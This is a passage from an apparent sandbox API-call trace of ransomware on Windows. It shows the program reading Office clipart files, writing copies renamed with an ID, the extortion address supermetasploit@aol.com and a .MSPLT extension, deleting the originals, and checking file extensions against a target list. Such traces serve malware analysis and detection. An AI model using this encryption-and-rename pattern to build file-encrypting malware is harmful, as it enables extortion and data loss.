lpOverlapped=0x0) returned 1 [0305.837] WriteFile (in: hFile=0x51c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xa00, lpOverlapped=0x0) returned 1 [0305.838] ReadFile (in: hFile=0x470, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0305.838] WriteFile (in: hFile=0x51c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0305.838] SetEndOfFile (hFile=0x51c) returned 1 [0305.838] CloseHandle (hObject=0x51c) returned 1 [0305.840] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0305.840] SetEndOfFile (hFile=0x470) returned 1 [0305.844] CloseHandle (hObject=0x470) returned 1 [0305.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0305.845] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00262_.wmf")) returned 1 [0305.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.846] lstrlenW (lpString=".doc") returned 4 [0305.846] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0305.846] lstrlenW (lpString=".docx") returned 5 [0305.846] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0305.846] lstrlenW (lpString=".pdf") returned 4 [0305.846] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0305.846] lstrlenW (lpString=".xls") returned 4 [0305.846] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0305.846] lstrlenW (lpString=".xlsx") returned 5 [0305.846] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0305.846] lstrlenW (lpString=".ppt") returned 4 [0305.846] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0305.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.846] lstrlenW (lpString=".zip") returned 4 [0305.846] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0305.846] lstrlenW (lpString=".rar") returned 4 [0305.846] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0305.846] lstrlenW (lpString=".bz2") returned 4 [0305.846] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0305.846] lstrlenW (lpString=".7z") returned 3 [0305.846] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0305.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.847] lstrlenW (lpString=".dbf") returned 4 [0305.847] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0305.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.847] lstrlenW (lpString=".1cd") returned 4 [0305.847] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0305.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.847] lstrlenW (lpString=".jpg") returned 4 [0305.847] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0305.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.847] lstrlenW (lpString=".doc") returned 4 [0305.847] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0305.847] lstrlenW (lpString=".docx") returned 5 [0305.847] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0305.847] lstrlenW (lpString=".pdf") returned 4 [0305.847] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0305.847] lstrlenW (lpString=".xls") returned 4 [0305.847] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0305.847] lstrlenW (lpString=".xlsx") returned 5 [0305.847] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0305.847] lstrlenW (lpString=".ppt") returned 4 [0305.847] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0305.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.847] lstrlenW (lpString=".zip") returned 4 [0305.847] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0305.847] lstrlenW (lpString=".rar") returned 4 [0305.847] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0305.847] lstrlenW (lpString=".bz2") returned 4 [0305.847] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0305.847] lstrlenW (lpString=".7z") returned 3 [0305.848] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0305.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.848] lstrlenW (lpString=".dbf") returned 4 [0305.848] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0305.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.848] lstrlenW (lpString=".1cd") returned 4 [0305.848] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0305.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00262_.WMF") returned 68 [0305.848] lstrlenW (lpString=".jpg") returned 4 [0305.848] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0305.848] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0305.848] lstrlenW (lpString="BL00390_.WMF") returned 12 [0305.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0305.850] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=13102) returned 1 [0305.850] CloseHandle (hObject=0x470) returned 1 [0305.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf")) returned 0x220 [0305.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0305.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0305.850] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0305.851] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0305.851] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0305.851] GetLastError () returned 0x0 [0305.851] ReadFile (in: hFile=0x470, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x332e, lpOverlapped=0x0) returned 1 [0305.854] WriteFile (in: hFile=0x51c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x3330, lpOverlapped=0x0) returned 1 [0305.856] ReadFile (in: hFile=0x470, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0305.856] WriteFile (in: hFile=0x51c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0305.856] SetEndOfFile (hFile=0x51c) returned 1 [0305.856] CloseHandle (hObject=0x51c) returned 1 [0305.860] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0305.860] SetEndOfFile (hFile=0x470) returned 1 [0305.865] CloseHandle (hObject=0x470) returned 1 [0305.866] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0306.094] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00390_.wmf")) returned 1 [0306.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.195] lstrlenW (lpString=".doc") returned 4 [0306.195] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0306.195] lstrlenW (lpString=".docx") returned 5 [0306.195] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0306.195] lstrlenW (lpString=".pdf") returned 4 [0306.195] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0306.195] lstrlenW (lpString=".xls") returned 4 [0306.195] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0306.195] lstrlenW (lpString=".xlsx") returned 5 [0306.195] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0306.195] lstrlenW (lpString=".ppt") returned 4 [0306.195] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0306.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.195] lstrlenW (lpString=".zip") returned 4 [0306.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0306.195] lstrlenW (lpString=".rar") returned 4 [0306.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0306.196] lstrlenW (lpString=".bz2") returned 4 [0306.196] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0306.196] lstrlenW (lpString=".7z") returned 3 [0306.196] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0306.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.196] lstrlenW (lpString=".dbf") returned 4 [0306.196] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0306.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.196] lstrlenW (lpString=".1cd") returned 4 [0306.196] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0306.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.196] lstrlenW (lpString=".jpg") returned 4 [0306.196] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0306.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.196] lstrlenW (lpString=".doc") returned 4 [0306.196] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0306.196] lstrlenW (lpString=".docx") returned 5 [0306.196] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0306.196] lstrlenW (lpString=".pdf") returned 4 [0306.197] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0306.197] lstrlenW (lpString=".xls") returned 4 [0306.197] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0306.197] lstrlenW (lpString=".xlsx") returned 5 [0306.197] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0306.197] lstrlenW (lpString=".ppt") returned 4 [0306.197] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0306.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.197] lstrlenW (lpString=".zip") returned 4 [0306.197] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0306.197] lstrlenW (lpString=".rar") returned 4 [0306.197] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0306.197] lstrlenW (lpString=".bz2") returned 4 [0306.197] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0306.197] lstrlenW (lpString=".7z") returned 3 [0306.197] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0306.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.197] lstrlenW (lpString=".dbf") returned 4 [0306.197] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0306.197] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.197] lstrlenW (lpString=".1cd") returned 4 [0306.197] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0306.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 68 [0306.198] lstrlenW (lpString=".jpg") returned 4 [0306.198] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0306.198] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0306.198] lstrlenW (lpString="BL00392_.WMF") returned 12 [0306.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0306.404] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=27050) returned 1 [0306.404] CloseHandle (hObject=0x528) returned 1 [0306.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf")) returned 0x220 [0307.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0307.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0307.142] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.142] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0307.143] GetLastError () returned 0x0 [0307.143] ReadFile (in: hFile=0x538, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x69aa, lpOverlapped=0x0) returned 1 [0307.166] WriteFile (in: hFile=0x53c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x69b0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x69b0, lpOverlapped=0x0) returned 1 [0307.170] ReadFile (in: hFile=0x538, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0307.170] WriteFile (in: hFile=0x53c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0307.170] SetEndOfFile (hFile=0x53c) returned 1 [0307.170] CloseHandle (hObject=0x53c) returned 1 [0307.173] SetFilePointerEx (in: hFile=0x538, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0307.173] SetEndOfFile (hFile=0x538) returned 1 [0307.181] CloseHandle (hObject=0x538) returned 1 [0307.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0307.182] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00392_.wmf")) returned 1 [0307.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.183] lstrlenW (lpString=".doc") returned 4 [0307.183] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0307.183] lstrlenW (lpString=".docx") returned 5 [0307.183] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0307.183] lstrlenW (lpString=".pdf") returned 4 [0307.183] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0307.183] lstrlenW (lpString=".xls") returned 4 [0307.183] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0307.183] lstrlenW (lpString=".xlsx") returned 5 [0307.183] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0307.183] lstrlenW (lpString=".ppt") returned 4 [0307.183] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0307.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.183] lstrlenW (lpString=".zip") returned 4 [0307.184] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0307.184] lstrlenW (lpString=".rar") returned 4 [0307.184] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0307.184] lstrlenW (lpString=".bz2") returned 4 [0307.184] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0307.184] lstrlenW (lpString=".7z") returned 3 [0307.184] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0307.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.184] lstrlenW (lpString=".dbf") returned 4 [0307.184] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0307.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.184] lstrlenW (lpString=".1cd") returned 4 [0307.184] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0307.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.743] lstrlenW (lpString=".jpg") returned 4 [0307.743] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0307.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.743] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.743] lstrlenW (lpString=".doc") returned 4 [0307.743] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0307.743] lstrlenW (lpString=".docx") returned 5 [0307.743] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0307.743] lstrlenW (lpString=".pdf") returned 4 [0307.743] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0307.743] lstrlenW (lpString=".xls") returned 4 [0307.743] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0307.743] lstrlenW (lpString=".xlsx") returned 5 [0307.743] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0307.743] lstrlenW (lpString=".ppt") returned 4 [0307.743] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0307.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.744] lstrlenW (lpString=".zip") returned 4 [0307.744] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0307.744] lstrlenW (lpString=".rar") returned 4 [0307.744] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0307.744] lstrlenW (lpString=".bz2") returned 4 [0307.744] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0307.744] lstrlenW (lpString=".7z") returned 3 [0307.744] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0307.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.744] lstrlenW (lpString=".dbf") returned 4 [0307.744] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0307.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.744] lstrlenW (lpString=".1cd") returned 4 [0307.744] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0307.744] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 68 [0307.744] lstrlenW (lpString=".jpg") returned 4 [0307.744] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0307.744] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0307.745] lstrlenW (lpString="BL00921_.WMF") returned 12 [0307.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0308.775] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=4408) returned 1 [0308.775] CloseHandle (hObject=0x528) returned 1 [0308.775] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf")) returned 0x220 [0309.224] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0309.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0309.541] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0309.541] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0309.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00921_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00921_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0309.549] GetLastError () returned 0x0 [0309.549] ReadFile (in: hFile=0x524, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x1138, lpOverlapped=0x0) returned 1 [0309.554] WriteFile (in: hFile=0x520, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x1140, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x1140, lpOverlapped=0x0) returned 1 [0309.558] ReadFile (in: hFile=0x524, 